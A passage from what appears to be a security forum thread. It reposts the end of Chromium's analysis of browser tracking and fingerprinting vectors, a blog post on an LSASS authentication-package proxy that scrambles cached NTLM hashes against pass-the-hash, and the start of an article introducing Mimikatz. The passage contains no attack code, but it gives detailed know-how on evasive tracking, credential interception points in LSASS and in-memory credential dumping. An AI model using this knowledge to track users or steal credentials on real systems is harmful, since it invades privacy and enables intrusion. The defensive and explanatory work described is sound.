in Firefox, localStorage can be written and read in cross-domain frames even if third-party cookies are disabled. Due to the similarity of the design goals of these APIs, the authors expect that the perception and the caveats of using HTML5 storage for storing session identifiers would be similar to the situation with Flash and Silverlight. Cached objects For performance reasons, all mainstream web browsers maintain a global cache of previously retrieved HTTP resources. Although this mechanism is not explicitly designed as a random-access storage mechanism, it can be easily leveraged as such. To accomplish this, a cooperating server may return, say, a JavaScript document with a unique identifier embedded in its body, and set Expires / max-age= headers to a date set in the distant future. Once this unique identifier is stored within a script subresource in the browser cache, the ID can be read back on any page on the Internet simply by loading the script from a known URL and monitoring the agreed-upon local variable or setting up a predefined callback function in JavaScript. The browser will periodically check for newer copies of the script by issuing a conditional request to the originating server with a suitable If-Modified-Since header; but if the server consistently responds to such check with HTTP code 304 (“Not modified”), the old copy will continue to be reused indefinitely. There is no concept of blocking “third-party” cache objects in any browser known to the authors of this document, and no simple way to prevent cache objects from being stored without dramatically degrading performance of everyday browsing. Automated detection of such behaviors is extremely difficult owing to the sheer volume and complexity of cached JavaScript documents encountered on the modern Web. All browsers expose the option to manually clear the document cache. That said, because clearing the cache requires specific action on the part of the user, it is unlikely to be done regularly, if at all. Leveraging the browser cache to store session identifiers is very distinct from using HTTP cookies; the authors are unsure if and how the cookie settings - the convenient abstraction layer used for most of the other mechanisms discussed to date - could map to the semantics of browser caches. Cache metadata: ETag and Last-Modified To make implicit browser-level document caching work properly, servers must have a way to notify browsers that a newer version of a particular document is available for retrieval. The HTTP/1.1 standard specifies two methods of document versioning: one based on the date of the most recent modification, and another based on an abstract, opaque identifier known as ETag. In the ETag scheme, the server initially returns an opaque “version tag” string in a response header alongside with the actual document. On subsequent conditional requests to the same URL, the client echoes back the value associated with the copy it already has, through an If-None-Matchheader; if the version specified in this header is still current, the server will respond with HTTP code 304 (“Not Modified”) and the client is free to reuse the cached document. Otherwise, a new document with a new ETag will follow. Interestingly, the behavior of the ETag header closely mimics that of HTTP cookies: the server can store an arbitrary, persistent value on the client, only to read it back later on. This observation, and its potential applications for browser tracking date back at least to 2000. The other versioning scheme, Last-Modified, suffers from the same issue: servers can store at least 32 bits of data within a well-formed date string, which will then be echoed back by the client through a request header known as If-Modified-Since. (In practice, most browsers don't even require the string to be a well-formed date to begin with.) Similarly to tagging users through cache objects, both of these “metadata” mechanisms are unaffected by the deletion of cookies and related site data; the tags can be destroyed only by purging the browser cache. As with Flash LSOs, use of ETag to allegedly skirt browser cookie settings has been subject to scrutiny. HTML5 AppCache Application Caches allow website authors to specify that portions of their websites should be stored on the disk and made available even if the user is offline. The mechanism is controlled by cache manifests that outline the rules for storing and retrieving cache items within the app. Similarly to implicit browser caching, AppCaches make it possible to store unique, user-dependent data - be it inside the cache manifest itself, or inside the resources it requests. The resources are retained indefinitely and not subject to the browser’s usual cache eviction policies. AppCache appears to occupy a netherworld between HTML5 storage mechanisms and the implicit browser cache. In some browsers, it is purged along with cookies and stored website data; in others, it is discarded only if the user opts to delete the browsing history and all cached documents. Note: AppCache is likely to be succeeded with Service Workers; the privacy properties of both mechanisms are likely to be comparable. Flash resource cache Flash maintains its own internal store of resource files, which can be probed using a variety of techniques. In particular, the internal repository includes an asset cache, relied upon to store Runtime Shared Libraries signed by Adobe to improve applet load times. There is also Adobe Flash Access, a mechanism to store automatically acquired licenses for DRM-protected content. As of this writing, these document caches do not appear to be coupled to any browser privacy settings and can only be deleted by making several independent configuration changes in the Flash Settings Manager UI on macromedia.com. We believe there is no global option to delete all cached resources or prevent them from being stored in the future. Browsers other than Chrome appear to share Flash asset data across all installations and in private browsing modes, which may have consequences for users who rely on separate browser instances to maintain distinct online identities. SDCH dictionaries SDCH is a Google-developed compression algorithm that relies on the use of server-supplied, cacheable dictionaries to achieve compression rates considerably higher than what’s possible with methods such as gzip or deflate for several common classes of documents. The site-specific dictionary caching behavior at the core of SDCH inevitably offers an opportunity for storing unique identifiers on the client: both the dictionary IDs (echoed back by the client using the Avail-Dictionary header), and the contents of the dictionaries themselves, can be used for this purpose, in a manner very similar to the regular browser cache. In Chrome, the data does not persist across browser restarts; it was, however, shared between profiles and incognito modes and was not deleted with other site data when such an operation is requested by the user. Google addressed this in bug 327783. Other script-accessible storage mechanisms Several other more limited techniques make it possible for JavaScript or other active content running in the browser to maintain and query client state, sometimes in a fashion that can survive attempts to delete all browsing and site data. For example, it is possible to use window.name or sessionStorage to store persistent identifiers for a given window: if a user deletes all client state but does not close a tab that at some point in the past displayed a site determined to track the browser, re-navigation to any participating domain will allow the window-bound token to be retrieved and the new session to be associated with the previously collected data. More obviously, the same is true for active JavaScript: any currently open JavaScript context is allowed to retain state even if the user attempts to delete local site data; this can be done not only by the top-level sites open in the currently-viewed tabs, but also by “hidden” contexts such as HTML frames, web workers, and pop-unders. This can happen by accident: for example, a running ad loaded in an <iframe> may remain completely oblivious to the fact that the user attempted to clear all browsing history, and keep using a session ID stored in a local variable in JavaScript. (In fact, in addition to JavaScript, Internet Explorer will also retain session cookies for the currently-displayed origins.) Another interesting and often-overlooked persistence mechanism is the caching of RFC 2617 HTTP authentication credentials: once explicitly passed in an URL, the cached values may be sent on subsequent requests even after all the site data is deleted in the browser UI. In addition to the cross-browser approaches discussed earlier in this document, there are also several proprietary APIs that can be leveraged to store unique identifiers on the client system. An interesting example of this are the proprietary persistence behaviors in some versions of Internet Explorer, including the userData API. Last but not least, a variety of other, less common plugins and plugin-mediated interfaces likely expose analogous methods for storing data on the client, but have not been studied in detail as a part of this write-up; an example of this may be the PersistenceService API in Java, or the DRM license management mechanisms within Silverlight. Lower-level protocol identifiers On top of the fingerprinting mechanisms associated with HTTP caching and with the purpose-built APIs available to JavaScript programs and plugin-executed code, modern browsers provide several network-level features that offer an opportunity to store or retrieve unique identifiers: Origin Bound Certificates (aka ChannelID) are persistent self-signed certificates identifying the client to an HTTPS server, envisioned as the future of session management on the web. A separate certificate is generated for every newly encountered domain and reused for all connections initiated later on. By design, OBCs function as unique and stable client fingerprints, essentially replicating the operation of authentication cookies; they are treated as “site and plug-in data” in Chrome, and can be removed along with cookies. Uncharacteristically, sites can leverage OBC for user tracking without performing any actions that would be visible to the client: the ID can be derived simply by taking note of the cryptographic hash of the certificate automatically supplied by the client as a part of a legitimate SSL handshake. ChannelID is currently suppressed in Chrome in “third-party” scenarios (e.g., for different-domain frames). The set of supported ciphersuites can be used to fingerprint a TLS/SSL handshake. Note that clients have been actively deprecating various ciphersuites in recent years, making this attack even more powerful. In a similar fashion, two separate mechanisms within TLS - session identifiers and session tickets - allow clients to resume previously terminated HTTPS connections without completing a full handshake; this is accomplished by reusing previously cached data. These session resumption protocols provide a way for servers to identify subsequent requests originating from the same client for a short period of time. HTTP Strict Transport Security is a security mechanism that allows servers to demand that all future connections to a particular host name need to happen exclusively over HTTPS, even if the original URL nominally begins with “http://”. It follows that a fingerprinting server could set long-lived HSTS headers for a distinctive set of attacker-controlled host names for each newly encountered browser; this information could be then retrieved by loading faux (but possibly legitimately-looking) subresources from all the designated host names and seeing which of the connections are automatically switched to HTTPS. In an attempt to balance security and privacy, any HSTS pins set during normal browsing are carried over to the incognito mode in Chrome; there is no propagation in the opposite direction, however. It is worth noting that leveraging HSTS for tracking purposes would require establishing log(n) connections to uniquely identify n users, which makes it relatively unattractive, except for targeted uses; that said, creating a smaller number of buckets may be a valuable tool for refining other imprecise fingerprinting signals across a very large user base. Last but not least, virtually all modern browsers maintain internal DNS caches to speed up name resolution (and, in some implementations, to mitigate the risk of DNS rebinding attacks). Such caches can be easily leveraged to store small amounts of information for a configurable amount of time; for example, with 16 available IP addresses to choose from, around 8-9 cached host names would be sufficient to uniquely identify every computer on the Internet. On the flip side, the value of this approach is limited by the modest size of browser DNS caches and the potential conflicts with resolver caching on ISP level. Machine-specific characteristics With the notable exception of Origin-Bound Certificates, the techniques described in section 1 of the document rely on a third-party website explicitly placing a new unique identifier on the client system. Another, less obvious approach to web tracking relies on querying or indirectly measuring the inherent characteristics of the client system. Individually, each such signal will reveal just several bits of information - but when combined together, it seems probable that they may uniquely identify almost any computer on the Internet. In addition to being harder to detect or stop, such techniques could be used tocross-correlate user activity across various browser profiles or private browsing sessions. Furthermore, because the techniques are conceptually very distant from HTTP cookies, the authors find it difficult to decide how, if at all, the existing cookie-centric privacy controls in the browser should be used to govern such practices. EFF Panopticlick is one of the most prominent experiments demonstrating the principle of combining low-value signals into a high-accuracy fingerprint; there is also some evidence of sophisticated passive fingerprints being used by commercial tracking services. Browser-level fingerprints The most straightforward approach to fingerprinting is to construct identifiers by actively and explicitly combining a range of individually non-identifying signals available within the browser environment: User-Agent string, identifying the browser version, OS version, and some of the installed browser add-ons. (In cases where User-Agent information is not available or imprecise, browser versions can be usually inferred very accurately by examining the structure of other headers and by testing for the availability and semantics of the features introduced or modified between releases of a particular browser.) Clock skew and drift: unless synchronized with an external time source, most systems exhibit clock drift that, over time, produces a fairly unique time offset for every machine. Such offsets can be measured with microsecond precision using JavaScript. In fact, even in the case of NTP-synchronized clocks, ppm-level skews may be possible to measure remotely. Fairly fine-grained information about the underlying CPU and GPU, either as exposed directly (GL_RENDERER) or as measured by executing Javascript benchmarks and testing for driver- or GPU-specific differences in WebGL rendering or the application of ICC color profiles to <canvas> data. Screen and browser window resolutions, including parameters of secondary displays for multi-monitor users. The window-manager- and addon-specific “thickness” of the browser UI in various settings (e.g., window.outerHeight - window.innerHeight). The list and ordering of installed system fonts - enumerated directly or inferred with the help of an API such as getComputedStyle. The list of all installed plugins, ActiveX controls, and Browser Helper Objects, including their versions - queried or brute-forced through navigator.plugins[]. (Some add-ons also announce their existence in HTTP headers.) Information about installed browser extensions and other software. While the set cannot be directly enumerated, many extensions include web-accessible resources that aid in fingerprinting. In addition to this, add-ons such as popular ad blockers make detectable modifications to viewed pages, revealing information about the extension or its configuration. Using browser “sync” features may result in these characteristics being identical for a given user across multiple devices. A similar but less portable approach specific to Internet Explorer allows websites to enumerate locally installed software by attempting to load DLL resources via the res:// pseudo-protocol. Random seeds reconstructed from the output of non-cryptosafe PRNGs (e.g. Math.random(), multipart form boundaries, etc). In some browsers, the PRNG is initialized only at startup, or reinitialized using values that are system-specific (e.g., based on system time or PID). According to the EFF, their Panopticlick experiment - which combines only a relatively small subset of the actively-probed signals discussed above - is able to uniquely identify 95% of desktop users based on system-level metrics alone. Current commercial fingerprinters are reported to be considerably more sophisticatedand their developers might be able to claim significantly higher success rates. Of course, the value of some of the signals discussed here will be diminished on mobile devices, where both the hardware and the software configuration tends to be more homogenous; for example, measuring window dimensions or the list of installed plugins offers very little data on most Android devices. Nevertheless, we feel that the remaining signals - such as clock skew and drift and the network-level and user-specific signals described later on - are together likely more than sufficient to uniquely identify virtually all users. When discussing potential mitigations, it is worth noting that restrictions such as disallowing the enumeration of navigator.plugins[] generally do not prevent fingerprinting; the set of all notable plugins and fonts ever created and distributed to users is relatively small and a malicious script can conceivably test for every possible value in very little time. Network configuration fingerprints An interesting set of additional device characteristics is associated with the architecture of the local network and the configuration of lower-level network protocols; such signals are disclosed independently of the design of the web browser itself. These traits covered here are generally shared between all browsers on a given client and cannot be easily altered by common privacy-enhancing tools or practices; they include: The external client IP address. For IPv6 addresses, this vector is even more interesting: in some settings, the last octets may be derived from the device's MAC address and preserved across networks. A broad range of TCP/IP and TLS stack fingerprints, obtained with passive tools such as p0f. The information disclosed on this level is often surprisingly specific: for example, TCP/IP traffic will often reveal high-resolution system uptime data through TCP timestamps. Ephemeral source port numbers for outgoing TCP/IP connections, generally selected sequentially by most operating systems. The local network IP address for users behind network address translation or HTTP proxies (via WebRTC). Combined with the external client IP, internal NAT IP uniquely identifies most users, and is generally stable for desktop browsers (due to the tendency for DHCP clients and servers to cache leases). Information about proxies used by the client, as detected from the presence of extra HTTP headers (Via, X-Forwarded-For). This can be combined with the client’s actual IP address revealed when making proxy-bypassing connections using one of several available methods. With active probing, the list of open ports on the local host indicating other installed software and firewall settings on the system. Unruly actors may also be tempted to probe the systems and services in the visitor’s local network; doing so directly within the browser will circumvent any firewalls that normally filter out unwanted incoming traffic. User-dependent behaviors and preferences In addition to trying to uniquely identify the device used to browse the web, some parties may opt to examine characteristics that aren’t necessarily tied to the machine, but that are closely associated with specific users, their local preferences, and the online behaviors they exhibit. Similarly to the methods described in section 2, such patterns would persist across different browser sessions, profiles, and across the boundaries of private browsing modes. The following data is typically open to examination: Preferred language, default character encoding, and local time zone (sent in HTTP headers and visible to JavaScript). Data in the client cache and history. It is possible to detect items in the client’s cache by performing simple timing attacks; for any long-lived cache items associated with popular destinations on the Internet, a fingerprinter could detect their presence simply by measuring how quickly they load (and by aborting the navigation if the latency is greater than expected for local cache). (It is also possible to directly extract URLs stored in the browsing history, although such an attack requires some user interaction in modern browsers.) Mouse gesture, keystroke timing and velocity patterns, and accelerometer readings (ondeviceorientation) that are unique to a particular user or to particular surroundings. There is a considerable body of scientific research suggesting that even relatively trivial interactions are deeply user-specific and highly identifying. Any changes to default website fonts and font sizes, website zoom level, and the use of any accessibility features such as text color, size, or CSS overrides (all indirectly measurable with JavaScript). The state of client features that can be customized or disabled by the user, with special emphasis on mechanisms such as DNT, third-party cookie blocking, changes to DNS prefetching, pop-up blocking, Flash security and content storage, and so on. (In fact, users who extensively tweak their settings from the defaults may be actually making their browsers considerably easier to uniquely fingerprint.) On top of this, user fingerprinting can be accomplished by interacting with third-party services through the user’s browser, using the ambient credentials (HTTP cookies) maintained by the browser: Users logged into websites that offer collaboration features can be de-anonymized by covertly instructing their browser to navigate to a set of distinctively ACLed resources and then examining which of these navigation attempts result in a new collaborator showing up in the UI. Request timing, onerror and onload handlers, and similar measurement techniques can be used to detect which third-party resources return HTTP 403 error codes in the user’s browser, thus constructing an accurate picture of which sites the user is logged in; in some cases, finer-grained insights into user settings or preferences on the site can be obtained, too. (A similar but possibly more versatile login-state attack can be also mounted with the help of Content Security Policy, a new security mechanism introduced in modern browsers.) Any of the explicit web application APIs that allow identity attestation may be leveraged to confirm the identity of the current user (typically based on a starting set of probable guesses). Fingerprinting prevention and detection challenges In a world with no possibility of fingerprinting, web browsers would be indistinguishable from each other, with the exception of a small number of robustly compartmentalized and easily managed identifiers used to maintain login state and implement other essential features in response to user’s intent. In practice, the Web is very different: browser tracking and fingerprinting are attainable in a large number of ways. A number of the unintentional tracking vectors are a product of implementation mistakes or oversights that could be conceivably corrected today; many others are virtually impossible to fully rectify without completely changing the way that browsers, web applications, and computer networks are designed and operated. In fact, some of these design decisions might have played an unlikely role in the success of the Web. In lieu of eliminating the possibility of web tracking, some have raised hope of detecting use of fingerprinting in the online ecosystem and bringing it to public attention via technical means through browser- or server-side instrumentation. Nevertheless, even this simple concept runs into a number of obstacles: Some fingerprinting techniques simply leave no remotely measurable footprint, thus precluding any attempts to detect them in an automated fashion. Most other fingerprinting and tagging vectors are used in fairly evident ways, but could be easily redesigned so that they are practically indistinguishable from unrelated types of behavior. This would frustrate any programmatic detection strategies in the long haul, particularly if they are attempted on the client (where the party seeking to avoid detection can reverse-engineer the checks and iterate until the behavior is no longer flagged as suspicious). The distinction between behaviors that may be acceptable to the user and ones that might not is hidden from view: for example, a cookie set for abuse detection looks the same as a cookie set to track online browsing habits. Without a way to distinguish between the two and properly classify the observed behaviors, tracking detection mechanisms may provide little real value to the user. Potential directions for future work There may be no simple, universal, technical solutions to the problem of tracking on the Web by parties who are intent on doing so with no regard for user controls. That said, the authors of this page see some theoretical room for improvement when it comes to building simpler and more intuitive privacy controls to provide a better framework for the bulk of interactions with responsible sites and parties on the Internet: The current browser privacy controls evolved almost exclusively around the notion of HTTP cookies and several other very specific concepts that do not necessarily map cleanly to many of the tracking and fingerprinting methods discussed in this document. In light of this, to better meet user expectations, it may be beneficial for in-browser privacy settings to focus on clearly explaining practical privacy outcomes, rather than continuing to build on top of narrowly-defined concepts such as "third-party cookies". We worry that in some cases, interacting with browser privacy controls can degrade one’s browsing experience, discouraging the user from ever touching them. A canonical example of this is trying to delete cookies: reviewing them manually is generally impractical, while deleting all cookies will kick the user out of any sites he or she is logged into and frequents every day. Although fraught with some implementation challenges, it may be desirable to build better heuristics that distinguish and preserve site data specifically for the destinations that users frequently log into or meaningfully interact with. Even for extremely privacy-conscious users who are willing to put up with the inconvenience of deleting one’s cookies and purging other session data, resetting online fingerprints can be difficult and fail in unexpected ways. An example of this is discussed in section 1: if there are ads loaded on any of the currently open tabs, clearing all local data may not actually result in a clean slate. Investing in developing technologies that provide more robust and intuitive ways to maintain, manage, or compartmentalize one's online footprints may be a noble goal. Today, some privacy-conscious users may resort to tweaking multiple settings and installing a broad range of extensions that together have the paradoxical effect of facilitating fingerprinting - simply by making their browsers considerably more distinctive, no matter where they go. There is a compelling case for improving the clarity and effect of a handful of well-defined privacy settings as to limit the probability of such outcomes. We present these ideas for discussion within the community; at the same time, we recognize that although they may sound simple when expressed in a single paragraph, their technical underpinnings are elusive and may prove difficult or impossible to fully flesh out and implement in any browser. Sursa: http://www.chromium.org/Home/chromium-security/client-identification-mechanisms
  8. Using an SSP/AP LSASS Proxy to Mitigate Pass-the-Hash Pre-Windows 8.1 mit·i·gate verb make less severe, serious, or painful. "he wanted to mitigate misery in the world" [TABLE=class: vk_tbl vk_gy] [TR] [TD=class: lr_dct_nyms_ttl]synonyms:[/TD] [TD]alleviate, reduce, diminish, lessen, weaken, lighten, attenuate, take the edge off, allay, ease, assuage, palliate, relieve, tone down[/TD] [/TR] [/TABLE] Intro A colleague (Matt Weeks/scriptjunkie) guest posted an article on the passing-the-hash blog @passingthehash) about March being Pass-the-Hash awareness month, updating us on where we are at today regarding the family of issues. I thought this would be a good subject for an opening post. This post mostly concerns pre-Windows 8.1 systems that use Smart Cards and Kerberos as their primary form of authentication. It may apply to other configurations as well. This post covers the very basics of what I did to create a custom Security Support Provider/Authentication Package (SSP/AP) as a proxy in order to help mitigate the problem of LSASS storing NTLM credentials in its memory space. This technique should probably only be used when your primary mode of authentication is something other than NTLM, such as Kerberos, as it will prevent LSASS from properly caching NTLM credentials on the client for later use. While this does not solve the problem and is by no means a perfect solution (that probably has to come from Microsoft), it will at least offer some protection against some of the low hanging fruit attacks. Kerberos and NTLM Hashes Many believe that the solution to Pass-the-Hash is to simply require Kerberos on their network for authentication, thus moving the problem to Pass-the-Ticket. What they don't realize is that the system also generates an NTLM hash that is stored in the LSASS memory, even when it is not used. Without going into too much detail, as its documented elsewhere (see references below) the gist is that the key distribution center provides a hash of the user's credentials to be stored by the client's LSASS in case Kerberos is later unavailable, in which case the client will revert to using the hash for single-sign-on logins/authentication. Because of this, even on a domain that requires Kerberos to login and access network resources, a backup hash is readily available for stealing. The end effect is that, from an attacker's perspective, not much has changed. Any local logins will have their user credential hash stored in the LSASS memory for at least some time as will any remote desktop logins to that system (such as domain admins/privileged users). All the attacker needs to do is grab those hashes from LSASS memory and continue. This was the problem that we were trying to mitigate on the client machines. We'll come back to this... SSP/AP and SSP Proxies What are SSP/APs and SSPs? SSP/APs and SSPs are described on Microsoft's SSP/APs vs SSPs page, but basically they are packages (DLLs) that are loaded by LSASS upon start which can be used for various security mechanisms such as authentication, message integrity, and encryption. Microsoft provides a couple with Windows, to include msv1_0.dll (local interactive logins and NTLM authentication, among others) and kerberos.dll (Kerberos). Microsoft also allows custom SSP/APs and SSPs to be registered and loaded by LSASS as such: To register an SSP/AP, add the name of the package to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Authentication Packages. To register an SSP, add the name of the package to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages. For each package registered, a DLL with that package name (ex: mypackage = mypackage.dll) must exist in the Windows\System32 directory. Once the system restarts, LSASS will load the packages found in those two registry keys and use them as described in the SSP/AP and SSP documentation. What is an SSP/AP or SP Proxy? While researching the LSASS authentication flow and components, I came across a blog by Koby Kahane (Implementing an LSA proxy authentication package) describing how he implemented an LSA proxy authentication package. He did quite a bit of research into proxying msv1_0 in order to test the feasibility of adding additional authentication steps prior to passing control to the original package. When I saw this, one of the first things to come to mind was how could I use this technique to stop LSASS from caching credentials that I did not want used on the domain. Authentication Flow The flow of control through MSV1_0 and Kerberos isn't really documented very much (none officially), so I had to start mostly from scratch in order to identify where the credentials passed in order to determine the easiest locations to grab them. The key function appeared to be LsaApLogonUserEx2 in both Kerberos and MSV1_0. This is where much of the original work is done and where the credentials are returned from, initially. Once the call is made into Kerberos at this function, the credentials are gathered and returned back out to LSASS. Supplemental credentials gathered at this point will be sent to the appropriate security packages registered to handle them (such as MSV1_0 for NTLM) via the SpAddCredentials function. There they are processed by their respective security packages and at a point near the end are fired off to LSASS via the AddCredential function. Note: The order of those two may be reversed as it has been quite some time since I did this. This gave me several points in the chain where I was able to intercept and modify the hash in order to make it unusable before it was cached. Building and Using the Proxies After a colleague and I combed through the information, I decided that I could create a custom proxy in order to keep LSASS from caching the NTLM hashes that Kerberos added as supplemental credentials. There were two places of interest where I could have scrambled the incoming NTLM hash before it was stored. First, I could proxy the Kerberos module and scramble the NTLM hash before it was sent back to LSASS and into the MSV1_0 module or I could catch it as it was coming into MSV1_0 from Kerberos (as well as from any other source). I decided that I would create a proxy for each 'just in case' and then choose one of them after testing, as I felt that the less I messed around with Microsoft's subsystems the less chance something would go wrong. I created two proxies, one for the SSP/AP msv1_0.dll and another for the SSP kerberos.dll. I really needed to handle two different sets of calls. The first set was through the recommended use of the SpLsaModeInitialize and SpUserModeInitialize functions as described by Koby and the MSDN documentation, requiring you to create and populate the function tables accordingly, replacing any proxied functions with your own. The second method was by exporting and proxying the functions available in the original DLLs (such as through jmp tables initialized upon load) for any application that may bypass the tables entirely (don't always count on other programs to do things the way they are supposed to do them). MSV1_0 For the MSV1_0 proxy, the SpAddCredentialsPackage function needed to be proxied by saving the original pointer and placing a pointer to the new one into the returned function table in its place. This is where the incoming NTLM credentials would be intercepted and modified before being passed onto the real MSV1_0 (via its SpAddCredentialsPackage) and stored/cached. In the new function, I wanted to be selective about which logon types for which I scrambled the credentials as I still wanted local services to be able to start up and authenticate with the local system. To do this, I checked the incoming SECURITY_LOGON_TYPE parameter for the service type (or any other type that you want to allow to cache NTLM credentials - preferably only local accounts) and just pass on through to the original function then return. For everything else, I grabbed the PSECPKG_SUPPLEMENTAL_CRED structure and verified that the package name was "NTLM". If this was the case, I scrambled the LmPassword and NtPassword parts of that structure. Once that is done I just called the original function, passing in the scrambled supplemental credentials to the real MSV1_0. MSV1_0 takes them and LSASS will cache the useless hash into its memory. KERBEROS For the KERBEROS proxy (and the MSV1_0 proxy if you wish to also handle the hash coming from an interactive login at an earlier point in the process), I proxied and modified LsaApLogonUserEx2. In this case, I called the original as normal and intercepted the credentials being returned from that call. At that point, I used the same logic to check and scramble the supplemental (NTLM) credentials before returning. One other place that the credentials can be intercepted is at the point just prior to going into LSASS itself. This requires intercepting the proxied package's call to LASS' AddCredentials function, which is passed in via a function table during SpInitialize. In this case, the AddCredentials pointer is replaced by a pointer to a new function before passing the table to the original package such that when the original package calls that function to add credentials, it goes through the proxied function first. In the proxied function, the credentials need to be unwrapped via LsaUnprotectMemory, scrambled, and then re-wrapped via LsaProtectMemory before being passed into LSASS. This should not be necessary, but can be used as a failsafe. Using the Proxies After the proxies were completed, they needed to be put to use. There are two methods of doing this with pros and cons to each. First, one can simply rename the DLL being proxied to something else while using the real name (msv1_0.dll or kerberos.dll) for the proxy. Second, the original DLLs can keep the same name, using different names for the proxies while changing the registry entries for the Security Packages and/or Authentication Packages. For the former, the problem one may run into is having the DLLs modified when a patch/update comes down the line intended for Microsoft's DLLs. For the latter, someone with access to view those registry keys may notice the names are not what they were supposed to be. Choosing a Proxy In the end I chose to use the MSV1_0 proxy over the Kerberos proxy in order to catch hashes that may come from other packages/programs. When a set of credentials comes into LSASS, it is sent to the appropriate package for handling. In the case of NTLM credentials, they are sent to the MSV1_0 package. You could easily switch to using the Kerberos proxy, catching and scrubbing the supplemental credentials after returning from kerberos.dll in LsaApLogonUserEx2(). This, however, will not catch any NTLM hashes coming from outside of Kerberos. Alternatively, one could use both proxies as opposed to the minimum required to catch most cases. Summary With this technique, a good majority of automated/default attacks can be mitigated against Pass-the-Hash. While there is still a hash cached/stored in memory by LSASS, that hash has been scrambled and is therefore useless. If your systems use NTLM authentication then it probably means that SSO will no longer work resulting in endless login prompts when attempting to use remote resources. It's really only useful for networks that want to force Kerberos at the expense of legacy compatibility. Also, I need to reiterate that this does not solve the whole problem. There are other issues which I will not go into but my team had to solve such as protecting the proxies from attack. A sophisticated attacker has several methods in which this can be easily defeated if it is not protected. The proxies do absolutely nothing to mitigate an attacker intercepting credentials in other ways such as across the network or Pass-the-Ticket. It does help narrow the available target a little bit, and every little bit helps. One final note to keep in mind for anyone following in these footsteps. Mucking around with LSASS can get pretty messy. If you get something wrong you will not know until you've already told LSASS to load up your modules, in which case a crash of LSASS (assuming you don't blue screen) can prevent you from logging into that system again normally. I would advise that you test your development thoroughly using a VM, and once you do try it on a live system be prepared to revert, use a boot disc, or mount the hard drive via another system to fix it. Take heed of that if you are deploying it across a domain. I hope someone finds this useful. It's primarily targeted towards Windows XP and Windows 7, but may continue to apply to Windows 8 as well depending on how Microsoft works the Pass-the-Hash issue. -=[Kevin]=- Addendum A - DeleteSecurityPackage During my research and development relating to using SSP/APs and SSPs, I came across an issue with DeleteSecurityPackage that threw me for a loop. I was working on a system that would remove unauthorized Security Packages on a live system. Research led me to this function in the Windows security API - a function that was documented on MSDN as: Deletes a security support provider from the list of providers supported by Microsoft Negotiate. Attempting to use this function, however, failed. Upon use, the return value from the function was 0x80090302 (SEC_E_UNSUPPORTED_FUNCTION). That didn't seem right since it was documented and I had not found anything while searching the internet from anyone else to say otherwise. After double checking and ensuring that there was no error on my part I broke out my trusty IDA Pro and decided to trace the function back to its roots. After following several proxied jumps I got to the source function DeleteSecurityPackageW (DeleteSecurityPackageA also redirects to this function). Here is what I found: Apparently either Microsoft forgot to implement the function, or more likely discovered that it was a pretty hard problem to tackle without making any assumptions for the end user and decided not to implement it (while leaving the documentation online). To give them some credit, it does seem like it would be a difficult problem - when you remove a security package currently in use, what is your default policy for dealing with accounts logged in using that package? Do you kick them, keep them logged in (if that's possible), prevent removal until they log out? Maybe they decided it was better to just avoid the question altogether. It's not entirely bad that it's not implemented. It means that in order to remove a security package (such as to replace it), typically a reboot is going to be required as LSASS will force one if you try to remove it any other way. Who knows? Anyway, I e-mailed msdn support and posted a notice on the msdn documentation page, but never got a response... so there it is if anyone else is having an issue using it. Addendum B - EnumerateSecurityPackages Another issue that I came across while working with the Windows security APIs relating to LSASS was while using EnumerateSecurityPackages. I needed to use this function in order to monitor what security packages were loaded in order to detect if any were unauthorized. Initially, when I tested this function manually, everything was working fine. Each time I ran my test it showed me all of the currently loaded security packages, including any that I manually loaded after boot using AddSecurityPackage. Once I automated the process to periodically call the function I started seeing problems. What would happen is when a process first called this function it would populate a list with all of the security packages that it saw loaded. Subsequent calls would return the very same list. I double checked and was using FreeContextBuffer just as the documentation specified, but nothing changed. This was a rather annoying issue that I had to somehow overcome. My solution (and my recommended solution if it has not been fixed yet) was to embed a second binary into the parent binary which would be dropped and spawned by the parent each time it needs to be checked. The output of the spawn is easily wrapped and captured by the parent. The spawn can either be a temporary drop or a permanent drop executed periodically by the parent monitoring system. Since only the parent is constantly running, the spawn only needs to make that call and grab the list once per execution. Another e-mail and another post to the documentation on msdn without a response. It may or may not have been fixed by now, but just in case, here's one workaround. References Koby Kahane, 2008 http://kobyk.wordpress.com/2008/08/30/implementing-an-lsa-proxy-authentication-package/ SANS Institute Pass-the-hash attacks: Tools and Mitigation Bashar Ewaida, 2010 Kerberos Working Group Johansson, 2009 Core Labs Hernan Ochoa ...and my former team at MacAulay-Brown... EDITS: 20140327 Added the definition of mitigation to the top in order to prevent any misunderstandings. Added the twitter handle for @passthehash in the introduction. Posted by Kevin Keathley at 5:44 AM Sursa: http://cybernigma.blogspot.ro/2014/03/using-sspap-lsass-proxy-to-mitigate.html
  9. Mimikatz and Active Directory Kerberos Attacks by Sean Metcalf Mimikatz is the latest, and one of the best, tool to gather credential data from Windows systems. In fact I consider Mimikatz to be the “swiss army knife” of Windows credentials – that one tool that can do everything. Since the author of Mimikatz, Benjamin Delpy, is French most of the resources describing Mimikatz usage is in French, at least on his blog. The Mimikatz GitHub repository is in English and includes useful information on command usage. Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept). There are two optional components that provide additional features, mimidrv (driver to interact with the Windows kernal) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested). After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service, LSASS, process in memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn’t prompted each time resource access is requested. The credential data may include NTLM password hashes, LM password hashes (if the password is <15 characters), and even clear-text passwords (to support WDigest and SSP authentication among others. While you can prevent a Windows computer from creating the LM hash in the local computer SAM database (and the AD database), though this doesn’t prevent the system from generating the LM hash in memory. The majority of Mimikatz functionality is available in PowerSploit (PowerShell Post-Exploitation Framework) through the “Invoke-Mimikatz” PowerShell script which “leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the mimikatz binary to disk.” Mimikatz functionality supported by Invoke-Mimikatz is noted below. Benjamin Delpy posted an Excel chart on OneDrive (shown below) that shows what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2 which have enhanced protection mechanisms reducing the amount and type of credentials kept in memory. (Click image to embiggen) One of the biggest security concerns with Windows today is “Pass the Hash.” Simply stated, Windows 